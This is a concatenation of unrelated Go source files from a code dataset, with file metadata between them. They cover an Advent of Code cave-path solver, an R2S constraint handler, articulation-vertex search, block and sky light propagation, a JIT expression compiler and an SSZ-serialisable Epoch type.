return &passagePathing{
dailyProblem{
day: 12,
},
}
}
func (p *passagePathing) Solve() interface{} {
input := p.GetInputLines()
var results []int
results = append(results, p.allPaths(input))
results = append(results, p.allPathsPlusADetour(input))
return results
}
/*
With your submarine's subterranean subsystems subsisting suboptimally, the only way you're getting out of this cave anytime soon is by finding a path yourself. Not just a path - the only way to know if you've found the best path is to find all of them.
Fortunately, the sensors are still mostly working, and so you build a rough map of the remaining caves (your puzzle input). For example:
start-A
start-b
A-c
A-b
b-d
A-end
b-end
This is a list of how all of the caves are connected. You start in the cave named start, and your destination is the cave named end. An entry like b-d means that cave b is connected to cave d - that is, you can move between them.
So, the above cave system looks roughly like this:
start
/ \
c--A-----b--d
\ /
end
Your goal is to find the number of distinct paths that start at start, end at end, and don't visit small caves more than once. There are two types of caves: big caves (written in uppercase, like A) and small caves (written in lowercase, like b). It would be a waste of time to visit any small cave more than once, but big caves are large enough that it might be worth visiting them multiple times. So, all paths you find should visit small caves at most once, and can visit big caves any number of times.
Given these rules, there are 10 paths through this example cave system:
start,A,b,A,c,A,end
start,A,b,A,end
start,A,b,end
start,A,c,A,b,A,end
start,A,c,A,b,end
start,A,c,A,end
start,A,end
start,b,A,c,A,end
start,b,A,end
start,b,end
(Each line in the above list corresponds to a single path; the caves visited by that path are listed in the order they are visited and separated by commas.)
Note that in this cave system, cave d is never visited by any path: to do so, cave b would need to be visited twice (once on the way to cave d and a second time when returning from cave d), and since cave b is small, this is not allowed.
Here is a slightly larger example:
dc-end
HN-start
start-kj
dc-start
dc-HN
LN-dc
HN-end
kj-sa
kj-HN
kj-dc
The 19 paths through it are as follows:
start,HN,dc,HN,end
start,HN,dc,HN,kj,HN,end
start,HN,dc,end
start,HN,dc,kj,HN,end
start,HN,end
start,HN,kj,HN,dc,HN,end
start,HN,kj,HN,dc,end
start,HN,kj,HN,end
start,HN,kj,dc,HN,end
start,HN,kj,dc,end
start,dc,HN,end
start,dc,HN,kj,HN,end
start,dc,end
start,dc,kj,HN,end
start,kj,HN,dc,HN,end
start,kj,HN,dc,end
start,kj,HN,end
start,kj,dc,HN,end
start,kj,dc,end
Finally, this even larger example has 226 paths through it:
fs-end
he-DX
fs-he
start-DX
pj-DX
end-zg
zg-sl
zg-pj
pj-he
RW-he
fs-DX
pj-RW
zg-RW
start-pj
he-WI
zg-he
pj-fs
start-RW
How many paths through this cave system are there that visit small caves at most once?
*/
func (p *passagePathing) allPaths(input []string) int {
paths := p.parseInput(input)
return p.countPaths(paths, paths.Start, make(map[Node]int), true)
}
/*
After reviewing the available paths, you realize you might have time to visit a single small cave twice. Specifically, big caves can be visited any number of times, a single small cave can be visited at most twice, and the remaining small caves can be visited at most once. However, the caves named start and end can only be visited exactly once each: once you leave the start cave, you may not return to it, and once you reach the end cave, the path must end immediately.
Now, the 36 possible paths through the first example above are:
start,A,b,A,b,A,c,A,end
start,A,b,A,b,A,end
start,A,b,A,b,end
start,A,b,A,c,A,b,A,end
start,A,b,A,c,A,b,end
start,A,b,A,c,A,c,A,end
start,A,b,A,c,A,end
start,A,b,A,end
start,A,b,d,b,A,c,A,end
start,A,b,d,b,A,end
start,A,b,d,b,end
start,A,b,end
start,A,c,A,b,A,b,A,end
start,A,c,A,b,A,b,end
start,A,c,A,b,A,c,A,end
start,A,c,A,b,A,end
start,A,c,A,b,d,b,A,end
start,A,c,A,b,d,b,end
start,A,c,A,b,end
start,A,c,A,c,A,b,A,end
start,A,c,A,c,A,b,end
start,A,c,A,c,A,end
start,A,c,A,end
start,A,end
start,b,A,b,A,c,A,end
start,b,A,b,A,end
start,b,A,b,end
start,b,A,c,A,b,A,end
start,b,A,c,A,b,end
start,b,A,c,A,c,A,end
start,b,A,c,A,end
start,b,A,end
start,b,d,b,A,c,A,end
start,b,d,b,A,end
start,b,d,b,end
start,b,end
The slightly larger example above now has 103 paths through it, and the even larger example now has 3509 paths through it.
Given these new rules, how many paths through this cave system are there?
*/
func (p *passagePathing) allPathsPlusADetour(input []string) int {
paths := p.parseInput(input)
return p.countPaths(paths, paths.Start, make(map[Node]int), false)
}
// countPaths counts distinct start->end paths via depth-first search.
// visited tracks how many times each cave has been entered. Small
// (lowercase) caves may be revisited once only while visitedTwice is
// false; pass visitedTwice=true to forbid any small-cave revisit
// (part 1), false to allow a single one (part 2).
func (p *passagePathing) countPaths(paths *Graph, start Node, visited map[Node]int, visitedTwice bool) int {
	if start == paths.End {
		return 1
	}
	// Re-entering a small cave: allowed once if the "detour" is unused.
	if (start[0] >= 'a' && start[0] <= 'z') && visited[start] >= 1 && start != paths.Start {
		if !visitedTwice {
			visitedTwice = true
		} else {
			return 0
		}
	}
	visited[start]++
	pathCount := 0
	for _, n := range paths.Edges[start] {
		if n != paths.Start { // the start cave is never re-entered
			pathCount += p.countPaths(paths, n, p.copyMap(visited), visitedTwice)
		}
	}
	return pathCount
}
// copyMap returns a shallow copy of the visit-count map so that
// sibling recursive calls do not share mutable state.
func (p *passagePathing) copyMap(m map[Node]int) map[Node]int {
	out := make(map[Node]int, len(m))
	for k, v := range m {
		out[k] = v
	}
	return out
}
// parseInput builds an undirected cave graph from "a-b" edge lines.
func (p *passagePathing) parseInput(input []string) *Graph {
	paths := &Graph{
		Edges: make(map[Node][]Node),
		Start: "start",
		End:   "end",
	}
	for _, line := range input {
		nodeStrings := strings.Split(line, "-")
		left := Node(nodeStrings[0])
		right := Node(nodeStrings[1])
		// Record the edge in both directions.
		paths.Edges[left] = append(paths.Edges[left], right)
		paths.Edges[right] = append(paths.Edges[right], left)
	}
	return paths
} | internal/advent/day12.go | 0.641984 | 0.428592 | day12.go | starcoder |
package chm
import (
"math"
"github.com/CRAB-LAB-NTNU/PPS-BS/biooperators"
"github.com/CRAB-LAB-NTNU/PPS-BS/types"
)
// R2S struct defines the parameters needed by r2s and the methods available
type R2S struct {
Z float64
//InitialDeltaIn, InitialDeltaOut float64
DeltaIn, DeltaOut []float64
HasCheckedActiveConstraints bool
ActiveConstraints []bool
Val float64
NUMacd, FESc, FESmax int
}
// NewR2S constructs an R2S constraint handler.
// FESc is the evaluation budget over which deltaOut decays to zero,
// val the activity threshold used by constraint detection, and z the
// decay exponent for deltaOut. Per-generation delta slices are sized
// by generations.
// NOTE(review): NUMacd is stored but unused in this chunk — presumably
// the sample size for active-constraint detection; confirm elsewhere.
func NewR2S(FESc, NUMacd int, val, z float64, constraintsCount, generations int) *R2S {
	return &R2S{
		DeltaIn:                     make([]float64, generations),
		DeltaOut:                    make([]float64, generations),
		ActiveConstraints:           make([]bool, constraintsCount),
		HasCheckedActiveConstraints: false,
		FESmax:                      generations,
		FESc:                        FESc,
		NUMacd:                      NUMacd,
		Val:                         val,
		Z:                           z,
	}
}
// Name returns the identifier of this constraint-handling method.
func (r2s *R2S) Name() string {
	return "R2S"
}

// Threshold returns the outer feasibility threshold for a generation.
func (r2s *R2S) Threshold(gen int) float64 {
	return r2s.DeltaOut[gen]
}

// Initialise seeds deltaIn and deltaOut (at generation 0 and at t)
// with the maximum observed constraint violation.
func (r2s *R2S) Initialise(t int, maxviolation float64) {
	r2s.DeltaIn[0] = maxviolation
	r2s.DeltaIn[t] = maxviolation
	r2s.DeltaOut[0] = maxviolation
	r2s.DeltaOut[t] = maxviolation
}
// InitializeDeltaIn is used to initialize deltaIn to the input parameter passed to the method
func (r2s *R2S) initializeDeltaIn(initialDeltaIn float64) {
//fmt.Println("DeltaIn[0]: ", initialDeltaIn)
r2s.DeltaIn[0] = initialDeltaIn
}
// InitializeDeltaOut is used to set an initial value for deltaOut
func (r2s *R2S) initializeDeltaOut(feasibleRatio float64, population []types.Individual) {
//If number of feasible solutions is below 20% we calculate using maxviolation of the 20 "best" individuals
//If not it is set to 1.
//TODO: evalute if there are better approaches with better synergy with PPS
if feasibleRatio < 0.2 {
rankedPopulation := biooperators.FastNonDominatedSort(population)
bestIndividuals := make([]types.Individual, len(population)*1/5)
i := 0
for _, nonDominatingSet := range rankedPopulation {
for _, individual := range nonDominatingSet {
bestIndividuals[i] = individual
i++
if i == len(bestIndividuals) {
break
}
}
if i == len(bestIndividuals) {
break
}
}
sumConstraintViolation := 0.0
for _, individual := range bestIndividuals {
//fmt.Println(i, "\tTotal Constraint Violation: ", individual.Fitness().TotalViolation())
sumConstraintViolation += individual.Fitness().TotalViolation()
}
r2s.DeltaOut[0] = sumConstraintViolation / float64(len(bestIndividuals))
} else {
r2s.DeltaOut[0] = 1
}
//fmt.Println("DeltaOut[0]: ", r2s.DeltaOut[0])
}
// Update updates the deltaIn and deltaOut of r2s.
// Require that cfe is a float to allow the use of interface for constraint handling.
func (r2s *R2S) Update(t int, cfe float64) {
if r2s.HasActiveConstraints() {
r2s.updateDeltaIn(t, int(cfe))
r2s.updateDeltaOut(t, int(cfe))
}
}
// updateDeltaIn shrinks the inner boundary DeltaIn[t] linearly with the
// number of consumed fitness evaluations cfe, never dropping below 0.2% of
// the initial DeltaIn[0].
func (r2s *R2S) updateDeltaIn(t int, cfe int) {
	// Lower bound: 0.2% of the initial inner boundary.
	minDeltaIn := 0.002 * r2s.DeltaIn[0]
	p1 := float64(cfe)
	numerator := r2s.DeltaIn[0] - minDeltaIn
	denominator := float64(r2s.FESmax)
	// Linear decay from DeltaIn[0] towards minDeltaIn over FESmax evaluations.
	calcDeltaIn := r2s.DeltaIn[0] - p1*(numerator/denominator)
	r2s.DeltaIn[t] = math.Max(minDeltaIn, calcDeltaIn)
	//fmt.Println("DeltaIn[", t, "]=", r2s.DeltaIn[t])
}
// updateDeltaOut shrinks the outer boundary DeltaOut[t] polynomially
// (exponent r2s.Z) while cfe is within the FESc evaluation budget, and
// clamps it to 0 once the budget is exhausted.
func (r2s *R2S) updateDeltaOut(t int, cfe int) {
	if cfe <= r2s.FESc {
		p1 := r2s.DeltaOut[0]
		numerator := float64(cfe)
		denominator := float64(r2s.FESc)
		// Fraction of the FESc budget still remaining, in [0, 1].
		p2 := 1 - (numerator / denominator)
		r2s.DeltaOut[t] = p1 * math.Pow(p2, r2s.Z)
	} else {
		r2s.DeltaOut[t] = 0.0
	}
	//fmt.Println("DeltaOut[", t, "]=", r2s.DeltaOut[t])
}
// ACD (active constraint detection) inspects the fitness values of
// individuals near an assumed optimal individual and marks a constraint as
// active when any individual's constraint value lies within r2s.Val of zero.
// It runs at most once; subsequent calls are no-ops.
func (r2s *R2S) ACD(iter, cfe int, fitness []types.Fitness) {
	if r2s.HasCheckedActiveConstraints {
		return
	}
	// Guard: an empty fitness slice previously panicked on fitness[0].
	// Detection stays pending until a non-empty slice is supplied.
	if len(fitness) == 0 {
		return
	}
	r2s.HasCheckedActiveConstraints = true
	activeConstraints := make([]bool, fitness[0].ConstraintCount)
	for _, fit := range fitness {
		for constraint, constraintVal := range fit.ConstraintValues {
			if r2s.constraintIsActive(constraintVal) {
				activeConstraints[constraint] = true
			}
		}
	}
	r2s.ActiveConstraints = activeConstraints
}
// constraintIsActive reports whether a constraint value lies within the
// activity tolerance r2s.Val of zero.
func (r2s *R2S) constraintIsActive(constraintVal float64) bool {
	distance := math.Abs(constraintVal)
	return distance <= r2s.Val
}
// HasActiveConstraints reports whether at least one constraint of the
// problem is currently marked as active.
func (r2s R2S) HasActiveConstraints() bool {
	for i := range r2s.ActiveConstraints {
		if r2s.ActiveConstraints[i] {
			return true
		}
	}
	return false
}
// Violation returns the constraint violation of an individual at generation t.
//
// Without active constraints it falls back to the plain total violation.
// Otherwise, for every active constraint, the individual is tested against
// the band defined by DeltaIn[t] and DeltaOut[t]: individuals inside the
// band contribute nothing, individuals outside contribute their distance to
// the nearer boundary.
func (r2s R2S) Violation(t int, fitness types.Fitness) float64 {
	var total float64
	if !r2s.HasActiveConstraints() {
		return fitness.TotalViolation()
	}
	for c, isActiveConstraint := range r2s.ActiveConstraints {
		if !isActiveConstraint {
			continue
		}
		// Distances from the inner (l) and outer (r) boundaries for this constraint.
		l := r2s.l(t, fitness.ConstraintTypes[c], fitness.ConstraintValues[c])
		r := r2s.r(t, fitness.ConstraintTypes[c], fitness.ConstraintValues[c])
		if l >= 0 && l <= r2s.DeltaIn[t] && r >= 0 && r <= r2s.DeltaOut[t] {
			// Individual lies inside the boundary band: no penalty.
			continue
		}
		// Penalise by the distance to the nearer boundary.
		total += math.Min(math.Abs(l), math.Abs(r))
	}
	return math.Abs(total)
}
func (r2s R2S) l(t int, constraintType types.ConstraintType, constraintViolation float64) float64 {
if constraintType == types.EqualsOrGreaterThanZero {
return r2s.DeltaIn[t] - math.Max(0.0, constraintViolation)
}
return r2s.DeltaIn[t] - math.Abs(math.Min(0.0, constraintViolation))
}
func (r2s R2S) r(t int, constraintType types.ConstraintType, constraintViolation float64) float64 {
if constraintType == types.EqualsOrGreaterThanZero {
return r2s.DeltaOut[t] - math.Abs(math.Min(0.0, constraintViolation))
}
return r2s.DeltaOut[t] - math.Max(0.0, constraintViolation)
} | chm/r2s.go | 0.607081 | 0.465813 | r2s.go | starcoder |
package graph
import (
"github.com/DmitryBogomolov/algorithms/graph/internal/utils"
)
// In a DFS tree a vertex is articulation point if:
// - it is root and has at least two children
// - it is not root and has subtree with no back edges to ancestors
//
// findCutVerticesCore runs the DFS from vertexID, recording each vertex's
// discovery distance and the smallest distance reachable through back edges,
// and flags articulation vertices. The DFS root is identified by
// parentVertexID == vertexID.
func findCutVerticesCore(
	gr Graph,
	// original vertex distances (DFS discovery order; -1 marks unvisited)
	distances []int,
	// updated vertex distances (lowest distance reachable via back edges)
	updatedDistances []int,
	articulation []bool,
	// distance from DFS root to current vertex
	distance int,
	parentVertexID int, vertexID int,
) {
	children := 0
	distances[vertexID] = distance
	updatedDistances[vertexID] = distances[vertexID]
	for _, adjacentVertexID := range gr.AdjacentVertices(vertexID) {
		// A distance of -1 marks a vertex not yet visited by the DFS.
		if distances[adjacentVertexID] == -1 {
			children++
			findCutVerticesCore(gr, distances, updatedDistances, articulation, distance+1, vertexID, adjacentVertexID)
			// If child vertex distance is less than current vertex distance
			// then there is back edge from child vertex to ancestors of current vertex.
			updatedDistances[vertexID] = utils.Min(updatedDistances[vertexID], updatedDistances[adjacentVertexID])
			// If child vertex had back edge then its updated distance would be less
			// than current vertex original distance.
			if updatedDistances[adjacentVertexID] >= distances[vertexID] && parentVertexID != vertexID {
				articulation[vertexID] = true
			}
		} else if adjacentVertexID != parentVertexID {
			// Update current vertex distance - it can be reached faster going through child vertex.
			updatedDistances[vertexID] = utils.Min(updatedDistances[vertexID], distances[adjacentVertexID])
		}
	}
	// Current vertex is root and has at least two children.
	if parentVertexID == vertexID && children > 1 {
		articulation[vertexID] = true
	}
}
// FindCutVertices finds cut-vertices in a graph.
// Cut-vertex (articulation vertex) is a vertex whose removal increases number of connected components.
// A graph is biconnected if it has no articulation vertices.
// https://algs4.cs.princeton.edu/41graph/Biconnected.java.html
func FindCutVertices(gr Graph) []int {
distances := make([]int, gr.NumVertices())
updatedDistances := make([]int, gr.NumVertices())
articulation := make([]bool, gr.NumVertices())
utils.ResetList(distances)
utils.ResetList(updatedDistances)
for vertexID := 0; vertexID < gr.NumVertices(); vertexID++ {
if distances[vertexID] == -1 {
findCutVerticesCore(gr, distances, updatedDistances, articulation, 0, vertexID, vertexID)
}
}
var result []int
for vertexID, flag := range articulation {
if flag {
result = append(result, vertexID)
}
}
return result
} | graph/graph/cut_vertices.go | 0.68784 | 0.517815 | cut_vertices.go | starcoder |
package chunk
import (
"container/list"
"github.com/df-mc/dragonfly/server/block/cube"
)
// insertBlockLightNodes iterates over the chunk and looks for blocks that
// have a light level of at least 1. For every such block, a node is pushed
// onto the node queue.
func (a *lightArea) insertBlockLightNodes(queue *list.List) {
	a.iterSubChunks(anyLightBlocks, func(pos cube.Pos) {
		level := a.highest(pos, LightBlocks)
		if level > 0 {
			queue.PushBack(node(pos, level, BlockLight))
		}
	})
}
// anyLightBlocks checks if any block stored in the SubChunk passed emits light.
func anyLightBlocks(sub *SubChunk) bool {
	for _, layer := range sub.storages {
		for _, id := range layer.palette.values {
			if LightBlocks[id] == 0 {
				continue
			}
			return true
		}
	}
	return false
}
// insertSkyLightNodes iterates over the chunk and inserts a light node anywhere at the highest block in the
// chunk. In addition, any skylight above those nodes will be set to 15.
func (a *lightArea) insertSkyLightNodes(queue *list.List) {
	a.iterHeightmap(func(x, z int, height, highestNeighbour, highestY int) {
		// If we hit a block like water or leaves (something that diffuses but does not block light), we
		// need a node above this block regardless of the neighbours.
		pos := cube.Pos{x, height, z}
		if level := a.highest(pos, FilteringBlocks); level != 15 && level != 0 {
			queue.PushBack(node(pos.Add(cube.Pos{0, 1}), 15, SkyLight))
			pos[1]++
		}
		// y only counts iterations here; the actual column height is tracked
		// in pos[1], which is incremented inside the loop.
		for y := pos[1]; y < highestY; y++ {
			// We can do a bit of an optimisation here: We don't need to insert nodes if the neighbours are
			// lower than the current one, on the same Y level, or one level higher, because light in
			// this column can't spread below that anyway.
			if pos[1]++; pos[1] < highestNeighbour {
				queue.PushBack(node(pos, 15, SkyLight))
				continue
			}
			// Fill the rest with full skylight.
			a.setLight(pos, SkyLight, 15)
		}
	})
}
// insertLightSpreadingNodes inserts light nodes into the node queue passed which, when propagated, will
// spread into the neighbouring chunks.
func (a *lightArea) insertLightSpreadingNodes(queue *list.List, lt light) {
	a.iterEdges(a.nodesNeeded(lt), func(pa, pb cube.Pos) {
		la, lb := a.light(pa, lt), a.light(pb, lt)
		if la == lb || la-1 == lb || lb-1 == la {
			// No chance for this to spread. Don't check for the highest filtering blocks on the side.
			return
		}
		// Light may only spread from the brighter side to the darker side,
		// losing the receiving block's filter level plus one in the process.
		if filter := a.highest(pb, FilteringBlocks) + 1; la > filter && la-filter > lb {
			queue.PushBack(node(pb, la-filter, lt))
		} else if filter = a.highest(pa, FilteringBlocks) + 1; lb > filter && lb-filter > la {
			queue.PushBack(node(pa, lb-filter, lt))
		}
	})
}
// nodesNeeded checks if any light nodes of a specific light type are needed between two neighbouring SubChunks when
// spreading light between them.
func (a *lightArea) nodesNeeded(lt light) func(sa, sb *SubChunk) bool {
	if lt == SkyLight {
		return func(sa, sb *SubChunk) bool {
			// Nodes are needed only when the two SubChunks do not share the
			// same backing skylight storage (compared by pointer identity).
			return &sa.skyLight[0] != &sb.skyLight[0]
		}
	}
	return func(sa, sb *SubChunk) bool {
		// Don't add nodes if both sub chunks are either both fully filled with light or have no light at all.
		// NOTE(review): this is a pointer-identity comparison of the backing
		// arrays — presumably fully lit/unlit SubChunks share singleton light
		// arrays; confirm against the SubChunk implementation.
		return &sa.blockLight[0] != &sb.blockLight[0]
	}
}
// propagate spreads the next light node in the node queue passed through the lightArea a. propagate adds the neighbours
// of the node to the queue for as long as it is able to spread.
func (a *lightArea) propagate(queue *list.List) {
	n := queue.Remove(queue.Front()).(lightNode)
	// Skip the node if the position is already at least as bright as the node's level.
	if a.light(n.pos, n.lt) >= n.level {
		return
	}
	a.setLight(n.pos, n.lt, n.level)
	for _, neighbour := range a.neighbours(n) {
		// Moving into the neighbour costs its filter level plus one.
		filter := a.highest(neighbour.pos, FilteringBlocks) + 1
		// Only re-queue neighbours that would actually become brighter.
		if n.level > filter && a.light(neighbour.pos, n.lt) < n.level-filter {
			neighbour.level = n.level - filter
			queue.PushBack(neighbour)
		}
	}
}
// lightNode is a node pushed to the queue which is used to propagate light.
type lightNode struct {
	pos   cube.Pos // position the light spreads from
	lt    light    // light type being propagated (BlockLight or SkyLight)
	level uint8    // light level carried by this node
}

// node creates a new lightNode using the position, level and light type passed.
func node(pos cube.Pos, level uint8, lt light) lightNode {
	return lightNode{pos: pos, level: level, lt: lt}
}
package jit
import (
"fmt"
)
// unary expression OP X
type Expr1 struct {
	X  Expr // operand
	Op Op1  // unary operator; cast operators also encode the result kind
	K  Kind // result kind of the expression
}

// binary expression X OP Y
type Expr2 struct {
	X  Expr // first operand
	Y  Expr // second operand
	Op Op2  // binary operator; IDX denotes the indexing expression X[Y]
	K  Kind // result kind of the expression
}
// NewExpr1 builds the unary expression op x. For cast operators the result
// kind is taken from the operator itself, otherwise from the operand.
func NewExpr1(op Op1, x Expr) *Expr1 {
	kind := x.Kind()
	if op.IsCast() {
		// cast Ops have the same values
		// as the corresponding Kind
		kind = Kind(op)
	}
	return &Expr1{X: x, Op: op, K: kind}
}

// NewExpr2 builds the binary expression x op y; the result kind is x's kind.
func NewExpr2(op Op2, x Expr, y Expr) *Expr2 {
	return &Expr2{X: x, Y: y, Op: op, K: x.Kind()}
}

// NewExprIdx builds the indexing expression x[y] with the given element kind.
func NewExprIdx(x Expr, y Expr, kind Kind) *Expr2 {
	return &Expr2{X: x, Y: y, Op: IDX, K: kind}
}
// implement Expr interface

// Kind returns the result kind of the unary expression.
func (e *Expr1) Kind() Kind {
	return e.K
}

// Const reports whether the expression is a constant; a unary expression never is.
func (e *Expr1) Const() bool {
	return false
}

// String formats the expression: casts as kind(x), all other operators as (op x).
func (e *Expr1) String() string {
	if !e.Op.IsCast() {
		return fmt.Sprintf("(%v %v)", e.Op, e.X)
	}
	return fmt.Sprintf("%v(%v)", e.Op, e.X)
}
// implement Expr interface

// Kind returns the result kind of the binary expression.
func (e *Expr2) Kind() Kind {
	return e.K
}

// Const reports whether the expression is a constant; a binary expression never is.
func (e *Expr2) Const() bool {
	return false
}

// String formats the expression: indexing as x[y], all other operators as (x op y).
func (e *Expr2) String() string {
	if e.Op != IDX {
		return fmt.Sprintf("(%v %v %v)", e.X, e.Op, e.Y)
	}
	return fmt.Sprintf("%v[%v]", e.X, e.Y)
}
// IsLeaf reports whether e is a leaf expression, i.e. neither a unary nor a
// binary expression node.
func IsLeaf(e Expr) bool {
	if _, unary := e.(*Expr1); unary {
		return false
	}
	if _, binary := e.(*Expr2); binary {
		return false
	}
	return true
}
// compile expression
//
// Expr compiles e and returns the expression holding the result, together
// with the temporary soft register used for it (invalid when none was needed).
func (c *Comp) Expr(e Expr) (Expr, SoftReg) {
	return c.expr(e, nil)
}

// expr compiles e, optionally targeting dst (when non-nil). Composite
// expressions are dispatched to expr1/expr2; leaves are returned as-is.
func (c *Comp) expr(e Expr, dst Expr) (Expr, SoftReg) {
	var dstsoft SoftReg
	switch e := e.(type) {
	case *Expr1:
		return c.expr1(e, dst)
	case *Expr2:
		return c.expr2(e, dst)
	case Const, Reg, Mem, SoftReg:
		// Leaf: no code to emit, the expression itself is the result.
		// NOTE(review): a caller-provided dst is ignored here — the leaf is
		// returned instead of being copied into dst.
		dst = e
	default:
		errorf("unknown expression type %T: %v", e, e)
	}
	return dst, dstsoft
}
// compile unary expression
//
// expr1 emits the code computing the unary expression e. dst, when non-nil,
// is the location the result must be written to. It returns the result
// location and the temporary soft register holding it (invalid when the
// caller has nothing to free).
func (c *Comp) expr1(e *Expr1, dst Expr) (Expr, SoftReg) {
	dsoft, _ := dst.(SoftReg)
	var tofree SoftReg
	var dto Expr
	if dsoft.Valid() {
		// forward the request to write into dsoft
		dto = dst
	}
	src, ssoft := c.expr(e.X, dto)
	if dst == nil {
		if ssoft.Valid() {
			// reuse the operand's soft register, reinterpreted with the result kind
			dsoft = MakeSoftReg(ssoft.Id(), e.K)
		} else {
			dsoft = c.newTempReg(e.K)
			tofree = dsoft
		}
		dst = dsoft
	} else if dst != nil && dst.Kind() != e.K {
		// do not trust the kind of provided dst
		// NOTE(review): `dst != nil` is always true in this branch — the nil
		// case was fully handled above.
		if dsoft.Valid() {
			dsoft = MakeSoftReg(dsoft.Id(), e.K)
		} else {
			dsoft = c.newTempReg(e.K)
			tofree = dsoft
		}
		dst = dsoft
	}
	c.code.Op1(e.Op, src, dst)
	// Free the operand's temporary unless it doubles as the destination.
	if ssoft.Id() != dsoft.Id() {
		c.freeTempReg(ssoft)
	}
	if dsoft.Valid() && dsoft != dst {
		// copy dsoft to the requested destination
		// and free it
		c.code.Inst2(ASSIGN, dst, dsoft)
		c.freeTempReg(tofree)
		dsoft = MakeSoftReg(0, Invalid)
	}
	return dst, dsoft
}
// compile binary expression
//
// expr2 emits the code computing the binary expression e. dst, when non-nil,
// is the location the result must be written to. It returns the result
// location and the temporary soft register holding it (invalid when the
// caller has nothing to free).
func (c *Comp) expr2(e *Expr2, dst Expr) (Expr, SoftReg) {
	// output.Debugf("jit.Comp.expr2: e = %v, dst = %v", e, dst)
	// output.Debugf("\twith x.kind = %v, y.kind = %v, e.kind = %v", e.X.Kind(), e.Y.Kind(), e.Kind())
	dsoft, _ := dst.(SoftReg)
	var tofree SoftReg
	var dto Expr
	if dsoft.Valid() {
		// forward the request to write into dst
		dto = dst
	}
	src1, soft1 := c.expr(e.X, dto)
	src2, soft2 := c.Expr(e.Y)
	if dst == nil {
		if soft1.Valid() {
			dsoft = MakeSoftReg(soft1.Id(), e.K)
		} else if soft2.Valid() && e.Op.IsCommutative() {
			// for commutative operators the second operand's register can act
			// as the destination too
			dsoft = MakeSoftReg(soft2.Id(), e.K)
		} else {
			dsoft = c.newTempReg(e.K)
			tofree = dsoft
		}
		dst = dsoft
	} else if dst != nil && dst.Kind() != e.K {
		// do not trust the kind of provided dst
		// NOTE(review): unlike expr1, this branch never redirects dst to the
		// freshly made dsoft before emitting Op2 — confirm whether a
		// `dst = dsoft` assignment was intended here.
		if dsoft.Valid() {
			dsoft = MakeSoftReg(dsoft.Id(), e.K)
		} else {
			dsoft = c.newTempReg(e.K)
			tofree = dsoft
		}
	}
	c.code.Op2(e.Op, src1, src2, dst)
	// Free operand temporaries unless one of them doubles as the destination.
	if soft1.Id() != dsoft.Id() {
		c.freeTempReg(soft1)
	}
	if soft2.Id() != dsoft.Id() {
		c.freeTempReg(soft2)
	}
	if dsoft.Valid() && dsoft != dst {
		// copy dsoft to the requested destination
		// and free it
		c.code.Inst2(ASSIGN, dst, dsoft)
		c.freeTempReg(tofree)
		dsoft = MakeSoftReg(0, Invalid)
	}
	return dst, dsoft
}
package types
import (
"fmt"
fssz "github.com/ferranbt/fastssz"
)
var _ fssz.HashRoot = (Epoch)(0)
var _ fssz.Marshaler = (*Epoch)(nil)
var _ fssz.Unmarshaler = (*Epoch)(nil)
// Epoch represents a single epoch.
type Epoch uint64

// Mul multiplies epoch by x.
func (e Epoch) Mul(x uint64) Epoch {
	return Epoch(x * uint64(e))
}

// Div divides epoch by x; it panics when x is zero.
func (e Epoch) Div(x uint64) Epoch {
	if x == 0 {
		panic("divbyzero")
	}
	return Epoch(uint64(e) / x)
}

// Add increases epoch by x.
func (e Epoch) Add(x uint64) Epoch {
	return Epoch(x + uint64(e))
}
// AddSlot increases epoch using slot value.
func (e Epoch) AddSlot(x Slot) Epoch {
	return Epoch(uint64(e) + uint64(x))
}

// AddEpoch increases epoch using another epoch value.
func (e Epoch) AddEpoch(x Epoch) Epoch {
	return e + x
}
// Sub subtracts x from the epoch; it panics when x exceeds the epoch value.
func (e Epoch) Sub(x uint64) Epoch {
	if uint64(e) < x {
		panic("underflow")
	}
	return Epoch(uint64(e) - x)
}

// Mod returns result of `epoch % x`.
func (e Epoch) Mod(x uint64) Epoch {
	return Epoch(uint64(e) % x)
}

// ModSlot returns result of `epoch % slot`.
func (e Epoch) ModSlot(x Slot) Epoch {
	return Epoch(uint64(e) % uint64(x))
}
// HashTreeRoot returns calculated hash root.
func (e Epoch) HashTreeRoot() ([32]byte, error) {
	return fssz.HashWithDefaultHasher(e)
}

// HashTreeRootWith writes the epoch into the provided fastssz hasher as a uint64.
func (e Epoch) HashTreeRootWith(hh *fssz.Hasher) error {
	hh.PutUint64(uint64(e))
	return nil
}
// UnmarshalSSZ deserializes the provided bytes buffer into the epoch object.
// The buffer must be exactly SizeSSZ() bytes long.
func (e *Epoch) UnmarshalSSZ(buf []byte) error {
	if size := e.SizeSSZ(); len(buf) != size {
		return fmt.Errorf("expected buffer of length %d received %d", size, len(buf))
	}
	*e = Epoch(fssz.UnmarshallUint64(buf))
	return nil
}
// MarshalSSZTo appends the serialized epoch to the provided byte slice.
func (e *Epoch) MarshalSSZTo(dst []byte) ([]byte, error) {
	marshalled, err := e.MarshalSSZ()
	if err != nil {
		return nil, err
	}
	dst = append(dst, marshalled...)
	return dst, nil
}

// MarshalSSZ marshals epoch into a serialized object.
func (e *Epoch) MarshalSSZ() ([]byte, error) {
	out := fssz.MarshalUint64([]byte{}, uint64(*e))
	return out, nil
}
// SizeSSZ returns the size of the serialized object.
// An Epoch always serializes to 8 bytes (a uint64).
func (e *Epoch) SizeSSZ() int {
	return 8
}
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.